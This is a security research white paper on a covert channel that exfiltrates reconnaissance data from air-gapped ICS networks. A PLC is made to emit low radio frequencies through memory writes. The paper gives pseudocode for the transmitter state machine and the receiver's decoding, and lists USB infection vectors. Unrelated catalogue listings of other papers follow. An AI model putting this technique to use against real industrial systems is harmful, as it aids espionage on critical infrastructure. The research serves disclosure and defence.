Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks
|
|
- Eleanore Welch
- 5 years ago
- Views:
Transcription
1 White Paper Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks David Atch, George Lashenko and Tal Kaminker White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 1
2 Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks David Atch, George Lashenko and Tal Kaminker Table of Contents Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks...2 David Atch, George Lashenko and Tal Kaminker...2 Introduction...3 Attack vectors for industrial networks...4 Scenario Malicious USB...4 Scenario External engineering laptop...5 Scenario Malicious updates...5 Data exfiltration...5 Ladder Logic...5 Generate low radio frequency...7 Exfiltration Ladder Logic...8 PLC Frequency Detection Tool...10 Optimal frequency detection...11 Synchronization Detection...12 Receiving data...14 Bios...15 About CyberX...15 White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 2
3 Introduction Best practices for industrial and critical infrastructure networks advised to separate IT and OT networks for years. This method of separation is still used in many companies as the main security measurement, sometimes combined with more security layers and sometimes with nothing at all. Relying on only Air-Gap as a security mechanism is just not enough. In this research, we are going to show why it s not enough. One of the challenges with bypassing Air-Gap is the need for a data channel, it s needed to exfiltrate the collected data from the Air-Gapped network. We are going to demonstrate how an attacker that obtained access to the network by some means, whether it s through a USB device shared between networks or an infected technician s laptop being connected to the Air-Gapped network, can establish data channels to send data through the Air-Gap. Data which may be sent might include: Network mapping, Security products mapping, Ladder Logic from controllers needed in the case of hot patching of malicious code, etc.. We exfiltrate data by generating low radio frequencies from a PLC, using specially crafted ladder logic on devices without built-in radio transmission capabilities. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 3
4 Attack vectors for industrial networks Air gap is a security measure that is being used by OT network owners to separate their network from the internet and reduce the risk of being infected by generic and non-targeted malware. There is a large debate whether disconnecting operational network from the internet is really a security measure, this research is not intended to answer this question, we assume the operational network is air gapped. Attacking operational networks requires multiple stages, and specially crafted malware. Before attackers can achieve his goals in attacking operational networks, wheatear it s spying or causing destruction, they need to execute a reconnaissance stage. The reconnaissance stage is essential part of the targeted attack and even more crucial in industrial networks, that s because OT networks contains diversity of vendors, equipment and protocols. Also in order to harm industrial equipment, the attacker need to have specific knowledge about the device and the Ladder Logic (PLC code) it contains, and because there are so many vendors, the reconnaissance stage in OT networks is a must. We are going to focus on the reconnaissance stage. The next methods are ways to attack an air gapped network, the attack described here will drop a tool which will act as a scanner/collector and its main purpose to bring home all the interesting data about the network. The tool should collect the following data: Network device mapping Security product mapping Device types and firmware versions Ladder Logic programs Schematics and design documents to figure device importance Overall working patterns of the users/devices Scenario Malicious USB This scenario describes the usage of infected USB to infect an air gapped network. The USB might be used by one of the engineers and get infected by PC that s connected to the internet or by someone who has been payed to connect it to the air gapped network. Air gapped networks are usually hard to patch because the lack of internet connection, also OT networks are much harder to patch because they require downtime of the network components, which might cause the OT network to be inoperable and may translate to financial harm. Also OT networks have outdated and non-supported operating systems. Because of that it s likely that the auto spreading USB mechanisms below will work: autorun.inf Enabled by default on Windows XP. It s a textual file placed on the drive and executes the designated executable upon USB insertion. Widely used by malware. LNK exploits Multiple exploits in the LNK format causes shortcuts to execute code upon directory browse. Used by the Stuxnet attack on air gapped OT network. DLL Search order hijacking Windows by default searches to load DLLs from the Current Working directory folder, it means that a software vulnerable to it might execute DLLs from the USB drive. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 4
5 Scenario External engineering laptop Many OT network owners use external engineers to programmer their software and controllers, also some engineers use their laptops to connect to the internet. If engineer s laptop is infected with malware, once it connects to the air gap network it might infect it as well. Again, this is also highly likely because of the lack of security updates in air gapped networks. Scenario Malicious updates This is based on past events where software vendors were explicitly targeted by attackers. The attackers will infect the main distribution of the software or it s updates, this is extremely hard to detect. Some OT vendors are not even signing digitally their updates and their software. The previous attacks have been seen in NotPetya which targeted financial software updates, and dragonfly which targeted industrial vendor software. Data Exfiltration Important key aspect of the reconnaissance stage is the data exfiltration part, in order to for the attacker to analyze the data that has been collected he need to bring it back. There are some methods how it can be done, most of them will require the malicious USB or the infected laptop to connect back to the network, which can take some time. During this time the reconnaissance tool might be discovered and terminated. We propose a new way of data exfiltration which involves injecting a Ladder Logic into PLC and using the PLC as low frequency radio transmitter. Ladder Logic It s the program that runs on a PLC, it s intended to process inputs from various IO devices connected to the PLC. PLC in very high level, looks like this: Hardware These are the components that the PLC uses, it is really similar to a regular PC and contains components such as RAM, CPU and Storage. Storage The PLC stores it s operating system and the Ladder Logic byte code itself. Firmware The operating system of the PLC, responsible for interacting with the various hardware components and executes the Ladder Logic bytecode. Ladder Logic This is usually written by standard Ladder Logic language, such as STL (Like an assembly language) or FBD (diagram representation of STL), Ladder Logic is compiled to bytecode by the vendor programming software and executed by the PLC. Because Ladder Logic has progressed during the years, today it s more than just a language to interact with IO components, it also contains API functions like socket recv/send. This gives the Ladder Logic developer much more power, previous research (PLC Blaster) showed that Ladder Logic might be used as a worm and network scanner. Ladder Logic consists of block, these are the main block types: FC Regular functions FB Function Blocks, like functions but uses storage to save its state DB Data Blocks, store variables for the Ladder Logic OB Organizational Block, Cyclic blocks which executed every x seconds or by some trigger White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 5
6 The basic block of a ladder logic program is the rung. This block is equivalent to the following code. An average ladder logic file contains tens of different rungs split among different OB, FB and FC blocks. The rungs are executed from left to right almost simultaneously, rungs written in OB blocks are executed cyclically all the time. Some OB blocks may be configured to execute in a reaction to an event or every x seconds using a timer. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 6
7 Generate low radio frequency Our research on generating low radio frequencies is based on the NSA paper TEMPEST. In this research they show how electricity powered devices can generate radio frequencies, which might be translated to data. We tried a few things to make the PLC generate frequencies using only Ladder Logic without any radio transmitter, these is our trials and errors: Execute heavy calculations to increase the electricity usage of the CPU. Didn t produce anything, that s because the PLC always executes code and uses the CPU, whether it calculates something or just in idle mode. Connect and disconnect an RJ45 cable from the onboard ethernet port, we assumed the network card might generate EM frequencies. The PLC did shift its frequency, but this method requires physical access and not practical for data exfiltration. Send and receive network traffic. Didn t produce anything. Use the Ladder Logic to write values to the memory. Produces shift in the EM frequency, that s because writing to the memory involves sending electricity on the bus to the memory chip. This is the idle PLC frequency, best strength around 363 HZ on multiple frequencies. This is how it looks when memory is being written. Every shift in the frequency space corresponds to a memory block being written. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 7
8 Exfiltration Ladder Logic Once we found a way to control the frequency shift we had a way to encode data, from here onward we had to develop a protocol that will allow one way transmission. We wrote our ladder logic in OB blocks, this way it is executed alongside any other ladder logic present on the device. The ladder logic is designed to work as a state machine the state variable is advanced every second in an OB block configured to be executed every second, these are the various states: 1. Initialization state a. all the variables are initialized to their initial values b. Upon completion it moves to state 2 2. Synchronization state a. Transmits a special synchronization sequence b. In the current implementation it lasts for 10 seconds, this may be changed to reflect transmission quality (a longer sequence makes the transmission slower, however, allows when the signal is less clear) c. The synchronization sequence is a simple sequences d. Upon completion it moves to state 3 3. Data transmission state a. The data we plan to transmit resides inside an array b. A bit is transmitted every second, however this is configurable and should be configured according to the signal strength c. Upon completion it moves to state 1 White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 8
9 send_bit Controls the current frequency, the rest of the program will manipulate bit variable to encode data If bit == 1: Memmove(dummy_src, dummy_dst, 10000) Else: Dummy_var = dummy_var * 123 sync A sync pattern is needed to detect the signal on the listening side If sync_start <= state <= sync_end: If state % 2 == 0: send_bit(1) Else: send_bit(0) extract_cur_bit The program sends data from a global array, we allow 5 bits per data char, we determine the current transmission bit using the state If sync_end <= state <= data_end: cur_bit = (data_arr[(state sync_end) / 8] >> ((state sync_end) % 8)) & 1 send_cur_bit We send the current bit If sync_end <= state <= data_end: If cur_bit == 1: send_bit(1) Else: send_bit(0) main The main execution while(true) if sync_start <= state < sync_end: sync() elif sync_end <= state < data_end: extract_cur_bit send_cur_bit() counter_advancement While (true) state += 1 state %= 60 sleep(1 sec) White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 9
10 PLC Frequency Detection Tool The PLC s ladder logic will transmit the data cyclically all the time, on the receiving side with need code that will: Detect the optimal frequency to extract the data from The PLC signal is visible across a range of frequencies Sometimes a nearby electrical device might cause distraction on certain frequencies Synchronize itself to the clock of the PLC The PLC will send a bit every second The receiving side has no information about the clock of the device, when does a signal end and when does the next signal begin The sync sequence is used to determine the ticks of the clock and to know when the data begins Receive the data bit by bit and rebuild words Once the program is synced to the PLC clock it known when a bit begins and when it ends Detect Optimal Frequency Sync Receive Data White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 10
11 Optimal frequency detection The PLC controlled frequencies are repeated in a certain sub spectrum however some frequencies are easier to work with then others because: A nearby device might cause a constant interference Some frequency in general have more noise Some frequencies are stronger At this stage we wish to find the optimal frequency to work with, this may be done by: 1. Extract the potential spectrum we use [350Khz, 420Hz] 2. Correlate the spectrum to a basic pattern of the synchronization block a. The purple is 1 indicating bright b. The yellow is -1 indicating dark c. The green is zero indicating we don t care about the value 3. We pick the frequency with the highest correlation (Making sure it s better than some threshold) 4. The correlating is especially significant during a sync White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 11
12 Synchronization Detection At this stage we work with a single frequency that seemed optimal in the previous stage. To illustrate what we see: Now we wish to detect a sync pattern which is a pattern of dark / light We focus on one side of the optimal frequency which leaves us with a simple decision whether we see light or dark pattern We shrink along the y axis by taking the average of the whole line, which gives us a 2D vector of the brightness White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 12
13 Again we use correlation this time it is a 2D correlating, but the pattern we look for is dark, light, dark, We correlate the previous pattern to The correlation will reach its pick during a perfect synchronization with the sync signal. At this stage we know the PLC is in its sync state We also know that we are perfectly synchronized to the PLC s clock and that the data will start arriving soon White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 13
14 Receiving Data At this point we are synchronized with the PLC s clock and we want to receive the actual data: We work with a 2D signal Every second we have to determine if this was a 1 or a zero Example of It s easy to see the ones and the zero s chunks. We know that the PLC will transmit the data for a certain amount of time and later will return to the synchronization state. Therefore, will we receive data for the same amount of time and then return to the Synchronization Detection to receive the next chunk. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 14
15 Bios David Atch, VP Research David is a world-class cybersecurity expert with many years of real-world experience in malware analysis, threat hunting, and incident response. He has contributed multiple submissions to ICS-CERT including for zero-day vulnerabilities in commercial ICS devices [see: search.usa.gov/search?utf8=%e2%9c%93&affiliate=us-cert-cs&query=atch&commit=search] and tracking malware campaigns targeting critical infrastructure [see: Targeting-Ukrainian]. Prior to CyberX, David had a military career in the IDF where he led a team of programmers and reverse engineers who continuously hunted and mitigated complex cyber-intrusions targeting the country's critical national infrastructure. He has also received multiple awards for technological innovation. Most recently, David was invited to present at the SANS ICS Security Summit in March CyberX is a Boston-based industrial cybersecurity company founded in 2013 by IDF cyber experts. George Lashenko, Security Researcher An experienced Security Researcher, George Lashenko brings to CyberX vast experience working with mathematical algorithms and developing large scale software development projects. Spending over 4 years in the Israel Defense Forces (IDF), George served in an elite unit, as a software engineer in teams in charge of protecting the IDF's critical infrastructure. Tal Kaminker, Machine Learning Researcher Tal is an experienced researcher and developer of Algorithms, with broad knowledge in statistical analysis and modeling of data. During his military career in the Israel Defense Forces (IDF), Tal served in an elite unite, responsible for securing the IDF s critical infrastructure and power grid, developing and implementing new algorithms and data res. About CyberX CyberX provides the most widely-deployed industrial cybersecurity platform for continuously reducing ICS risk. Supporting all OT vendors and seamlessly integrating with all existing IT security tools, CyberX s platform combines a deep understanding of industrial protocols, devices, and applications with ICS-specific asset discovery, continuous monitoring and incident forensics, risk and vulnerability management, automated threat modeling, and threat intelligence. With a long history of innovation, CyberX recently published the first-ever Global ICS & IIoT Risk Report, a DBIR-like analysis of real-world vulnerabilities found in 375 production ICS networks worldwide. Additionally, CyberX is the only OT security firm selected for the SINET Innovator Award sponsored by the US DHS and DoD; the only one recognized by the International Society of Automation (ISA); and the only one selected by the Israeli national consortium providing critical infrastructure protection for the Tokyo 2020 Olympics. For more information visit CyberX-Labs.com. White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 15
16 White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks 16
Technical Training Module ( 30 Days)
Annexure - I Technical Training Module ( 30 Days) Section 1 : Programmable Logic Controller (PLC) 1. Introduction to Programmable Logic Controller - A Brief History, Need and advantages of PLC, PLC configuration,
More informationSANS Top 20 Critical Controls for Effective Cyber Defense
WHITEPAPER SANS Top 20 Critical Controls for Cyber Defense SANS Top 20 Critical Controls for Effective Cyber Defense JANUARY 2014 SANS Top 20 Critical Controls for Effective Cyber Defense Summary In a
More informationPersistence Mechanisms as Indicators of Compromise
Persistence Persistence Mechanisms as Indicators of Compromise An automated technology for identifying cyber attacks designed to survive indefinitely the reboot process on PCs White Paper Date: October
More informationAddressing the SANS Top 20 Critical Security Controls for Effective Cyber Defense
A Trend Micro Whitepaper I February 2016 Addressing the SANS Top 20 Critical Security Controls for Effective Cyber Defense How Trend Micro Deep Security Can Help: A Mapping to the SANS Top 20 Critical
More informationTraining Document for Comprehensive Automation Solutions Totally Integrated Automation (T I A) MODULE A5 Programming the CPU 314C-2DP
Training Document for Comprehensive Automation Solutions Totally Integrated Automation (T I A) MODULE T I A Training Document Page 1 of 25 Module This document has been written by Siemens AG for training
More informationCyber Security. BDS PhantomWorks. Boeing Energy. Copyright 2011 Boeing. All rights reserved.
Cyber Security Automation of energy systems provides attack surfaces that previously did not exist Cyber attacks have matured from teenage hackers to organized crime to nation states Centralized control
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationS7 for Windows S7-300/400
S7 for Windows S7-300/400 A Programming System for the Siemens S7 300 / 400 PLC s IBHsoftec has an efficient and straight-forward programming system for the Simatic S7-300 and ern controller concept can
More informationCybersecurity Kill Chain. William F. Crowe, CISA, CISM, CRISC, CRMA September 2015 ISACA Jacksonville Chapter Meeting August 13, 2015
Cybersecurity Kill Chain William F. Crowe, CISA, CISM, CRISC, CRMA September 2015 ISACA Jacksonville Chapter Meeting August 13, 2015 Who Am I? Over 20 years experience with 17 years in the financial industry
More informationProcess Solutions. Staying Ahead of Today s Cyber Threats. White Paper
Process Solutions White Paper Staying Ahead of Today s Cyber Threats Executive Summary In an age where ubiquitous flash drives can become precision-guided munitions and a serious security breach is a single,
More informationNERC CIP Ports & Services. Part 2: Complying With NERC CIP Documentation Requirements
NERC CIP Ports & Services Part 2: Complying With NERC CIP Documentation Requirements White Paper FoxGuard Solutions, Inc. November 2014 Defining Ports And Services In part 2 of our Ports and Services white
More informationPost-Access Cyber Defense
Post-Access Cyber Defense Dr. Vipin Swarup Chief Scientist, Cyber Security The MITRE Corporation November 2015 Approved for Public Release; Distribution Unlimited. 15-3647. 2 Cyber Security Technical Center
More informationThe Importance of Cybersecurity Monitoring for Utilities
The Importance of Cybersecurity Monitoring for Utilities www.n-dimension.com Cybersecurity threats against energy companies, including utilities, have been increasing at an alarming rate. A comprehensive
More informationHong Kong Information Security Outlook 2015 香 港 資 訊 保 安 展 望
Hong Kong Information Security Outlook 2015 香 港 資 訊 保 安 展 望 Agenda Information Security Trends Year 2014 in Review Outlook for 2015 Advice to the Public Hong Kong Computer Emergency Response Team Coordination
More informationEEI Business Continuity. Threat Scenario Project (TSP) April 4, 2012. EEI Threat Scenario Project
EEI Business Continuity Conference Threat Scenario (TSP) April 4, 2012 EEI Threat Scenario 1 Background EEI, working with a group of CIOs and Subject Matter Experts, conducted a survey with member companies
More informationInformation Security Services
Information Security Services Information Security In 2013, Symantec reported a 62% increase in data breaches over 2012. These data breaches had tremendous impacts on many companies, resulting in intellectual
More informationGE Oil & Gas. Cyber Security for NERC CIP Versions 5 & 6 Compliance
GE Oil & Gas Cyber Security for NERC CIP Versions 5 & 6 Compliance Cyber Security for NERC CIP Versions 5 & 6 Compliance 2 Contents Cyber Security for NERC CIP Compliance... 5 Sabotage Reporting... 6 Security
More informationSCADA and Security Are they Mutually Exclusive? Terry M. Draper, PE, PMP
SCADA and Security Are they Mutually Exclusive? Terry M. Draper, PE, PMP Today s Topics SCADA Overview SCADA System vs. IT Systems Risk Factors Threats Potential Vulnerabilities Specific Considerations
More informationEndpoint Business Products Testing Report. Performed by AV-Test GmbH
Business Products Testing Report Performed by AV-Test GmbH January 2011 1 Business Products Testing Report - Performed by AV-Test GmbH Executive Summary Overview During November 2010, AV-Test performed
More informationIndustrial Control System Cyber Situational Awareness. Robert M. Lee* June 10 th, 2015
Industrial Control System Cyber Situational Awareness Robert M. Lee* June 10 th, 2015 Executive Summary Cyber situational awareness is the concept of understanding and visualizing the networked environment
More informationNSA/DHS Centers of Academic Excellence for Information Assurance/Cyber Defense
NSA/DHS Centers of Academic Excellence for Information Assurance/Cyber Defense Cyber Investigations Data Management Systems Security Data Security Analysis Digital Forensics Health Care Security Industrial
More informationWhat is Really Needed to Secure the Internet of Things?
What is Really Needed to Secure the Internet of Things? By Alan Grau, Icon Labs alan.grau@iconlabs.com The Internet of Things (IoT) has become a ubiquitous term to describe the tens of billions of devices
More informationCYBER SECURITY. Is your Industrial Control System prepared?
CYBER SECURITY Is your Industrial Control System prepared? Presenter: Warwick Black Security Architect Operation & Optimization Software Activity Schneider-Electric Challenges What challenges are there
More informationIncident Response. Six Best Practices for Managing Cyber Breaches. www.encase.com
Incident Response Six Best Practices for Managing Cyber Breaches www.encase.com What We ll Cover Your Challenges in Incident Response Six Best Practices for Managing a Cyber Breach In Depth: Best Practices
More informationCHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC
: INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS 1 FIVE KEY RECOMMENDATIONS During 2014, NTT Group supported response efforts for a variety of incidents. Review of these engagements revealed some observations
More informationSecurity in the smart grid
Security in the smart grid Security in the smart grid It s hard to avoid news reports about the smart grid, and one of the media s favorite topics is security, cyber security in particular. It s understandable
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More informationPatch and Vulnerability Management Program
Patch and Vulnerability Management Program What is it? A security practice designed to proactively prevent the exploitation of IT vulnerabilities within an organization To reduce the time and money spent
More informationWindows Server Performance Monitoring
Spot server problems before they are noticed The system s really slow today! How often have you heard that? Finding the solution isn t so easy. The obvious questions to ask are why is it running slowly
More informationDevelop a Dallas 1-Wire Master Using the Z8F1680 Series of MCUs
Develop a Dallas 1-Wire Master Using the Z8F1680 Series of MCUs AN033101-0412 Abstract This describes how to interface the Dallas 1-Wire bus with Zilog s Z8F1680 Series of MCUs as master devices. The Z8F0880,
More informationSoftware Asset Management (SWAM) Illustrative Process
Software Asset Management (SWAM) Illustrative Process Introduction The Software Assessment Management (SWAM) capability provides an organization visibility into the software installed and operating on
More informationSKP16C62P Tutorial 1 Software Development Process using HEW. Renesas Technology America Inc.
SKP16C62P Tutorial 1 Software Development Process using HEW Renesas Technology America Inc. 1 Overview The following tutorial is a brief introduction on how to develop and debug programs using HEW (Highperformance
More informationMicrosoft IT Increases Security and Streamlines Antimalware Management by Using Microsoft Forefront Endpoint. Protection 2010.
Situation Microsoft IT had limited monitoring and reporting functionality with its existing antimalware system. Although the system could scan for malware, there was no reporting capability or configurable
More informationCompany Profile. 1344 S Flores #205 San Antonio, TX 78204 210-694-2797 www.thomasontech.com
Company Profile 1344 S Flores #205 San Antonio, TX 78204 210-694-2797 www.thomasontech.com Trusted Security Advisor For Industrial Control Systems Thomason Technologies provides world-class security solutions
More informationNote monitors controlled by analog signals CRT monitors are controlled by analog voltage. i. e. the level of analog signal delivered through the
DVI Interface The outline: The reasons for digital interface of a monitor the transfer from VGA to DVI. DVI v. analog interface. The principles of LCD control through DVI interface. The link between DVI
More informationUsing Tofino to control the spread of Stuxnet Malware
technical datasheet Application Note Using Tofino to control the spread of Stuxnet Malware This application note describes how to use the Tofino Industrial Security Solution to prevent the spread of the
More informationINDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
More informationSecurity Issues with Integrated Smart Buildings
Security Issues with Integrated Smart Buildings Jim Sinopoli, Managing Principal Smart Buildings, LLC The building automation industry is now at a point where we have legitimate and reasonable concern
More informationAgilent Technologies Electronic Measurements Group Computer Virus Control Program
Agilent Technologies Electronic Measurements Group Computer Virus Control Program Agilent Technologies Electronic Measurements Group (EMG) recognizes the potential risk of computer virus infection that
More informationMaking the difference between read to output, and read to copy GOING BEYOND BASIC FILE AUDITING FOR DATA PROTECTION
Making the difference between read to output, and read to copy GOING BEYOND BASIC FILE AUDITING FOR DATA PROTECTION MOST OF THE IMPORTANT DATA LOSS VECTORS DEPEND ON COPYING files in order to compromise
More informationCritical Controls for Cyber Security. www.infogistic.com
Critical Controls for Cyber Security www.infogistic.com Understanding Risk Asset Threat Vulnerability Managing Risks Systematic Approach for Managing Risks Identify, characterize threats Assess the vulnerability
More informationHardware Trojans Detection Methods Julien FRANCQ
DEFENDING WORLD SECURITY Hardware Trojans Detection Methods Julien FRANCQ 2013, December the 12th Outline c 2013 CASSIDIAN CYBERSECURITY - All rights reserved TRUDEVICE 2013, December the 12th Page 2 /
More informationCIP- 005 R2: Understanding the Security Requirements for Secure Remote Access to the Bulk Energy System
CIP- 005 R2: Understanding the Security Requirements for Secure Remote Access to the Bulk Energy System Purpose CIP-005-5 R2 is focused on ensuring that the security of the Bulk Energy System is not compromised
More informationPLC Security for Water / Wastewater Systems
INDUSTRIAL INTERNET IN ACTION CASE STUDY PLC Security for Water / Wastewater Systems EXECUTIVE SUMMARY You have likely never worried about the possibility of a high school geek doing some programming that
More informationCyber Security for NERC CIP Version 5 Compliance
GE Measurement & Control Cyber Security for NERC CIP Version 5 Compliance imagination at work Contents Cyber Security for NERC CIP Compliance... 5 Sabotage Reporting... 6 Security Management Controls...
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More information5 Steps to Advanced Threat Protection
5 Steps to Advanced Threat Protection Agenda Endpoint Protection Gap Profile of Advanced Threats Consensus Audit Guidelines 5 Steps to Advanced Threat Protection Resources 20 Years of Chasing Malicious
More informationEnterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006
Enterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006 April 2013 Hologic and the Hologic Logo are trademarks or registered trademarks of Hologic, Inc. Microsoft, Active Directory,
More information8/27/2015. Brad Schuette IT Manager City of Punta Gorda bschuette@pgorda.us (941) 575-3354. Don t Wait Another Day
Brad Schuette IT Manager City of Punta Gorda bschuette@pgorda.us (941) 575-3354 2015 FRWA Annual Conference Don t Wait Another Day 1 SCADA Subsystems Management Physical Connectivity Configuration Mgmt.
More informationINFORMATION ASSURANCE DIRECTORATE
National Security Agency/Central Security Service INFORMATION ASSURANCE DIRECTORATE IAD Best Practices for Securing Wireless Devices and Networks in National Security Systems IAG U/OO/814639-15 13 October
More informationTop Ten Cyber Threats
Top Ten Cyber Threats Margaret M. McMahon, Ph.D. ICCRTS 2014 Introduction 2 Motivation Outline How malware affects a system Top Ten (Simple to complex) Brief description Explain impacts Main takeaways
More informationEnd-user Security Analytics Strengthens Protection with ArcSight
Case Study for XY Bank End-user Security Analytics Strengthens Protection with ArcSight INTRODUCTION Detect and respond to advanced persistent threats (APT) in real-time with Nexthink End-user Security
More informationBeyond the Hype: Advanced Persistent Threats
Advanced Persistent Threats and Real-Time Threat Management The Essentials Series Beyond the Hype: Advanced Persistent Threats sponsored by Dan Sullivan Introduction to Realtime Publishers by Don Jones,
More informationHow To Manage Security On A Networked Computer System
Unified Security Reduce the Cost of Compliance Introduction In an effort to achieve a consistent and reliable security program, many organizations have adopted the standard as a key compliance strategy
More informationBLUETOOTH SERIAL PORT PROFILE. iwrap APPLICATION NOTE
BLUETOOTH SERIAL PORT PROFILE iwrap APPLICATION NOTE Thursday, 19 April 2012 Version 1.2 Copyright 2000-2012 Bluegiga Technologies All rights reserved. Bluegiga Technologies assumes no responsibility for
More informationEnd User Devices Security Guidance: Apple ios 8
GOV.UK Guidance End User Devices Security Guidance: Apple ios 8 Published Contents 1. Changes since previous guidance 2. Usage scenario 3. Summary of platform security 4. How the platform can best satisfy
More informationCloud Security Primer MALICIOUS NETWORK COMMUNICATIONS: WHAT ARE YOU OVERLOOKING?
A Cloud Security Primer : WHAT ARE YOU OVERLOOKING? LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More informationCONTINUOUS DIAGNOSTICS BEGINS WITH REDSEAL
CONTINUOUS DIAGNOSTICS BEGINS WITH REDSEAL WHAT IS CDM? The continuous stream of high profile cybersecurity breaches demonstrates the need to move beyond purely periodic, compliance-based approaches to
More informationRoger W. Kuhn, Jr. Advisory Director Education Fellow Cyber Security Forum Initiative
Roger W. Kuhn, Jr. Advisory Director Education Fellow Cyber Security Forum Initiative November 2014 Disclaimer Current SCADA Vulnerability Factors Industrial Control Systems 101 Proposed Countermeasures
More informationPFP Technology White Paper
PFP Technology White Paper Summary PFP Cybersecurity solution is an intrusion detection solution based on observing tiny patterns on the processor power consumption. PFP is capable of detecting intrusions
More informationAppalachian Regional Commission Evaluation Report. Table of Contents. Results of Evaluation... 1. Areas for Improvement... 2
Report No. 13-35 September 27, 2013 Appalachian Regional Commission Table of Contents Results of Evaluation... 1 Areas for Improvement... 2 Area for Improvement 1: The agency should implement ongoing scanning
More informationSecuring Industrial Control Systems in the Chemical Sector. Roadmap Awareness Initiative Making the Business Case
Securing Industrial Control Systems in the Chemical Sector Roadmap Awareness Initiative Making the Business Case Developed by the Chemical Sector Coordinating Council in partnership with The U.S. Department
More informationICTN 4040. Enterprise Database Security Issues and Solutions
Huff 1 ICTN 4040 Section 001 Enterprise Information Security Enterprise Database Security Issues and Solutions Roger Brenton Huff East Carolina University Huff 2 Abstract This paper will review some of
More informationAnalyzing HTTP/HTTPS Traffic Logs
Advanced Threat Protection Automatic Traffic Log Analysis APTs, advanced malware and zero-day attacks are designed to evade conventional perimeter security defenses. Today, there is wide agreement that
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationThe Bus (PCI and PCI-Express)
4 Jan, 2008 The Bus (PCI and PCI-Express) The CPU, memory, disks, and all the other devices in a computer have to be able to communicate and exchange data. The technology that connects them is called the
More informationWho Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence. AIBA Quarterly Meeting September 10, 2015
Who Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence AIBA Quarterly Meeting September 10, 2015 The Answer 2 Everyone The relationship between the board, C-suite, IT, and compliance leaders
More informationG DATA TechPaper #0275. G DATA Network Monitoring
G DATA TechPaper #0275 G DATA Network Monitoring G DATA Software AG Application Development May 2016 Contents Introduction... 3 1. The benefits of network monitoring... 3 1.1. Availability... 3 1.2. Migration
More informationN-Dimension Solutions Cyber Security for Utilities
AGENDA ITEM NO.: 3.A. MEETING DATE; 08/18/2014 N-Dimension Solutions Cyber Security for Utilities Cyber Security Protection for Critical Infrastructure Assets The cyber threat is escalating - Confidential
More informationBenefits of Machine Learning. with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER
Benefits of Machine Learning with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER Overview The Evolution of Advanced Persistent Threat Detection Computer viruses have plagued
More informationSymantec Client Management Suite 8.0
IT Flexibility. User Freedom. Data Sheet: Endpoint Management Overview of Symantec Client Management Suite Symantec Client Management Suite automates time-consuming and redundant tasks for deploying, managing,
More informationInternet security: Shutting the doors to keep hackers off your network
Internet security: Shutting the doors to keep hackers off your network A Paralogic Networks Guide www.scholarisintl.com Introduction Like all revolutionary steps in technological development the Internet
More informationServer Based Desktop Virtualization with Mobile Thin Clients
Server Based Desktop Virtualization with Mobile Thin Clients Prof. Sangita Chaudhari Email: sangita123sp@rediffmail.com Amod N. Narvekar Abhishek V. Potnis Pratik J. Patil Email: amod.narvekar@rediffmail.com
More informationMigrating to Windows 7 - A challenge for IT Professionals
